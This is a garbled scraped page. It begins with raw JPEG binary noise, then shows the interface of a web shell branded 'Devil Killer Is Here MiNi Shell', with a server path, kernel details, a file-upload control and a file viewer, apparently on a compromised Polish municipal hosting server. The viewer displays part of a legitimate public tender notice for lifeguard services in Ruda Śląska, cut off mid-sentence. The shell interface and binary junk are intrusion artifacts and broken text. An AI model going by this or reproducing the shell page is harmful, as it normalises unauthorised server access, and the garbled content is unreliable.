JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251017/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251017/0048109401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zabezpieczenie ratownicze na pływalniach i kąpielisku letnim Miejskiego Ośrodka Sportu i Rekreacji w Rudzie Śląskiej w roku 2026. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejski Osrodek Sportu i Rekreacji</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 270227993</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Gen.Hallera 14 A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ruda Śląska</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-709</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dt@mosir.rsl.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mosir.rsl.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zabezpieczenie ratownicze na pływalniach i kąpielisku letnim Miejskiego Ośrodka Sportu i Rekreacji w Rudzie Śląskiej w roku 2026. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-89dfa1a2-bbd1-4cb6-8e05-97157d991181</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00481094</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00039602/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Zabezpieczenie ratownicze na pływalniach i kąpielisku letnim Miejskiego Ośrodka Sportu i Rekreacji w Rudzie Śląskiej na rok 2026</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-89dfa1a2-bbd1-4cb6-8e05-97157d991181 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-89dfa1a2-bbd1-4cb6-8e05-97157d991181</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja miedzy Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia (&#34;Platforma&#34;), która jest dostępna pod adresem <br/>https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-89dfa1a2-bbd1-4cb6-8e05-97157d991181</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Szczegółowe określenie zasad związanych z obowiązkiem informacyjnym RODO zawarto w rozdziale XXXIV SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DT.261.49.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Realizacja usługi będzie się odbywać na obiekcie basenu krytego przy ulicy Pokoju 13 w Rudzie Śląskiej – Nowym Bytomiu (kompleksowe zabezpieczenie obsługi ratowniczej), w okresie od dnia 02 stycznia 2026 r. do dnia 30 grudnia 2026 r. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">75252000-7 - Służby ratownicze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-02 do 2026-12-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie ratowników wodnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Realizacja usługi będzie się odbywać w obiekcie basenu krytego przy ulicy Oświęcimskiej 90 w Rudzie Śląskiej – Kochłowicach (kompleksowe zabezpieczenie obsługi ratowniczej), w okresie od dnia 02 stycznia 2026 r. do 31 grudnia 2026 r., </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">75252000-7 - Służby ratownicze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-02 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie ratowników wodnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Realizacja usługi będzie się odbywać na obiekcie:<br/><br/>1) kąpieliska letniego przy ulicy Ratowników 2 w Rudzie Śląskiej – Nowym Bytomiu (kompleksowe zabezpieczenie obsługi ratowniczej), w okresie od 26 czerwca 2026 r. do 31 sierpnia 2026 r. Szczegóły w opisie przedmiotu zamówienia.<br/><br/>2) kąpieliska letniego przy ulicy Ratowników 2 w Rudzie Śląskiej – Nowym Bytomiu, jako prawo opcji zgodnie z art. 441 ustawy Pzp (zabezpieczenie obsługi ratowniczej po otwarciu kąpieliska pod warunkiem słonecznej pogody (o temperaturze powyżej 25˚C lub umożliwiającej komfortowe korzystanie z basenu) w dniach 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25 czerwca 2026 r.). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">75252000-7 - Służby ratownicze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający na podstawie art. 441 § 5 ustawy Pzp przewiduje <br/>w niniejszym postępowaniu prawo opcji, przedmiot zamówienia obejmuje: zamówienie podstawowe oraz zamówienie objęte prawem opcji (niegwarantowane, opcjonalne). Przedmiot zamówienia określa zakres podstawowy oraz zakres opcji, w której wykorzystanie zależne jest od potrzeb i możliwości finansowych Zamawiającego. W formularzu ofertowym zostały wskazane „ilości podstawowe” oraz „ilość prawo opcji”. Szczegóły dotyczące prawa opcji znajdują się w opisie przedmiotu zamówienia (zał. nr 4 do SWZ)<br/> <br/>Zamawiający może skorzystać z prawa opcji przed upływem &#34;okresu podstawowego&#34;. Zamawiający złoży Wykonawcy oświadczenie o zastosowaniu prawa opcji. Niezłożenie oświadczenia będzie oznaczało , że Zamawiający rezygnuje z zastosowaniem prawa opcji. W przypadku zastosowania przez Zamawiającego prawa opcji, oświadczenie o skorzystaniu z prawa opcji będzie stanowiło integralna część umowy. Prawo opcji realizowane będzie na takich samych warunkach i w takiej samej cenie jak zamówienie podstawowe. <br/><br/>Zabezpieczenie obsługi ratowniczej po otwarciu kąpieliska odbywać się będzie pod warunkiem słonecznej pogody (o temperaturze powyżej 25˚C lub umożliwiającej komfortowe korzystanie z basenu) w dniach 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25 czerwca 2026 r.). <br/><br/>Przyjmuje się prawo opcji w ilości max. 585 godzin (basen letni Nowy Bytom). <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-06-13 do 2026-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie ratowników wodnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) Zdolność do występowania w obrocie gospodarczym<br/>Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie.<br/><br/><br/>2) Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej<br/>Wykonawca jest podmiotem uprawnionym do wykonywania ratownictwa wodnego w rozumieniu ustawy z dnia 18 sierpnia 2011 r. o bezpieczeństwie osób przebywających na obszarach wodnych (tj. Dz. U. z 2023 r. poz. 714 z późn. zm.) oraz uzyskał zgodę ministra właściwego do spraw wewnętrznych na wykonywanie ratownictwa wodnego oraz wpis do rejestru jednostek współpracujących z systemem Państwowe ratownictwo Medyczne, o którym mowa w art. 17 ust. 1 ustawy z dnia 8 września 2006 r. o Państwowym Ratownictwie Medycznym (tj. Dz. U. z 2025 r., poz. 91 z późn. zm.). W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający wymaga, aby czynności do wykonywania, których niezbędne jest posiadane uprawnień, wykonywał ten Wykonawca, który posiada uprawnienia.<br/><br/>3.) Sytuacja ekonomiczna lub finansowa<br/>Zamawiający nie określa warunków udziału w postepowaniu w tym zakresie.<br/><br/>4) Zdolność techniczna lub zawodowa:<br/>Wykonawca musi wykazać, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał lub wykonuje należycie co najmniej: dwie (2) usługi polegające na świadczeniu usług z zakresu ratownictwa wodnego na terenie pływalni krytej lub odkrytej, w tym otwarte akweny wodne, na kwotę minimum 300 000,00 PLN brutto każda (dla części nr 1 i 2) oraz na kwotę minimum 100 000,00 PLN brutto każda dla części nr 3.<br/><br/>Uwaga nr 1: W przypadku wykonywania i nie zakończenia jeszcze usługi, Wykonawca zobowiązany jest podać na jaką wartość, do momentu upływu terminu składania ofert, umowa została wykonana. Wartość ta będzie brana pod uwagę do oceny spełnienia warunku. <br/><br/>Uwaga nr 2: Wykonawca może wykazywać się realizacją usług w zakresie już wykonywanym, w sytuacji jednak, gdy całe świadczenie nie zostało zrealizowane. Wartość usług potwierdzających ich należyte wykonanie powinny dotyczyć zakresu już zrealizowanego, a nie objętego umową, która jeszcze nie została wykonana.<br/><br/>Uwaga nr 3: W przypadku wskazania przez Wykonawcę, w celu wykazania spełnienia warunków udziału, waluty innej niż polska (PLN), w celu jej przeliczenia stosowany będzie średni kurs NBP na dzień zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych na portalu internetowym Urzędu Zamówień Publicznych.<br/><br/>Uwaga nr 4: Mając na uwadze art. 117 ust. 1 ustawy Zamawiający zastrzega, że w sytuacji składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz analogicznie w sytuacji, gdy Wykonawca będzie polegał na zasobach innego podmiotu, na zasadach określonych w art. 118 ustawy, warunek o którym wyżej mowa, musi zostać spełniony w całości przez Wykonawcę (jednego z Wykonawców wspólnie składającego ofertę) lub podmiot, na którego zdolności w tym zakresie powołuje się Wykonawca – brak możliwości tzw. sumowania zasobów w zakresie doświadczenia.<br/><br/><br/><br/>Wykonawca musi wykazać dysponowanie osobami zdolnymi do wykonania zamówienia tj. dysponuje lub będzie dysponował co najmniej sześcioma osobami, które będą uczestniczyć w wykonywaniu zamówienia posiadającymi uprawnienia ratownika wodnego z ważnym zaświadczeniem o spełnieniu wymagań określonych w art. 13 ustawy z dnia 8 września 2006 r. o Państwowym Ratownictwie Medycznym (tj. Dz. U. z 2025 r., poz. 91 z późn. zm.). Każda z tych osób winna posiadać co najmniej 12 miesięcy doświadczenia zawodowego w pracy na stanowisku ratownika wodnego w zakresie pierwszej pomocy (KPP), w tym wymaga się, aby Wykonawca dysponował na czas realizacji zamówienia co najmniej jednym ratownikiem, który będzie pełnić funkcje koordynatora zespołu ratowników w okresie wykonywania zamówienia oraz posiadać minimum trzyletnie doświadczenie zawodowe na pracy stanowisku ratownika wodnego. – DOTYCZY: CZĘŚCI NR 1.<br/><br/><br/><br/>Wykonawca musi wykazać dysponowanie osobami zdolnymi do wykonania zamówienia tj. dysponuje lub będzie dysponował co najmniej sześcioma osobami, które będą uczestniczyć w wykonywaniu zamówienia posiadającymi uprawnienia ratownika wodnego z ważnym zaświadczeniem o spełnieniu wymagań określonych w art. 13 ustawy z dnia 8 września 2006 r. o Państwowym Ratownictwie Medycznym (tj. Dz. U. z 2025 r., poz. 91 z późn. zm.). Każda z tych osób winna posiadać co najmniej 12 miesięcy doświadczenia zawodowego w pracy na stanowisku ratownika wodnego w zakresie pierwszej pomocy (KPP), w tym wymaga się, aby Wykonawca dysponował na czas realizacji zamówienia co najmniej jednym ratownikiem, który będzie pełnić funkcje koordynatora zespołu ratowników w okresie wykonywania zamówienia oraz posiadać minimum trzyletnie doświadczenie zawodowe na pracy stanowisku ratownika wodnego. – DOTYCZY: CZĘŚCI NR 2.<br/><br/><br/><br/>Wykonawca musi wykazać dysponowanie osobami zdolnymi do wykonania zamówienia tj. dysponuje lub będzie dysponował co najmniej dziewięcioma osobami, które będą uczestniczyć w wykonywaniu zamówienia posiadającymi uprawnienia ratownika wodnego z ważnym zaświadczeniem o spełnieniu wymagań określonych w art. 13 ustawy z dnia 8 września 2006 r. o Państwowym Ratownictwie Medycznym (tj. Dz. U. z 2025 r., poz. 91 z późn. zm.). Każda z tych osób winna posiadać co najmniej 12 miesięcy doświadczenia zawodowego w pracy na stanowisku ratownika wodnego w zakresie pierwszej pomocy (KPP), w tym wymaga się, aby Wykonawca dysponował na czas realizacji zamówienia co najmniej jednym ratownikiem, który będzie pełnić funkcje koordynatora zespołu ratowników w okresie wykonywania zamówienia oraz posiadać minimum trzyletnie doświadczenie zawodowe na pracy stanowisku ratownika wodnego. – DOTYCZY: CZĘŚCI NR 3. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca, którego oferta zostanie najwyżej oceniona, w celu wykazania spełniania warunków udziału w postępowaniu (określonych przez Zamawiającego w ust. 3 niniejszego rozdziału SWZ), na podstawie art. 274 ust. 1 ustawy zostanie wezwany do złożenia następujących podmiotowych środków dowodowych (aktualnych na dzień ich złożenia):<br/><br/><br/>a) aktualny dokument potwierdzający posiadanie decyzji ministra właściwego do spraw wewnętrznych o zgodzie na wykonywanie przez Wykonawcę ratownictwa wodnego, o której mowa w art. 12 ust. 1 ustawy z dnia 18 sierpnia 2011 r. o bezpieczeństwie osób przebywających na obszarach wodnych oraz dokumentu potwierdzającego wpis Wykonawcy do rejestru jednostek współpracujących z systemem Państwowe Ratownictwo Medyczne, o którym mowa w art. 17 ust. 1 ustawy z dnia 8 września 2006 r. <br/>o Państwowym Ratownictwie Medycznym;<br/><br/><br/>b)wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy. Okres, o którym wyżej mowa liczy się wstecz od dnia, w którym upływa termin składania ofert.<br/>Uwaga: Dowodami, o których mowa są referencje bądź inne dokumenty sporządzone przez podmioty, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a 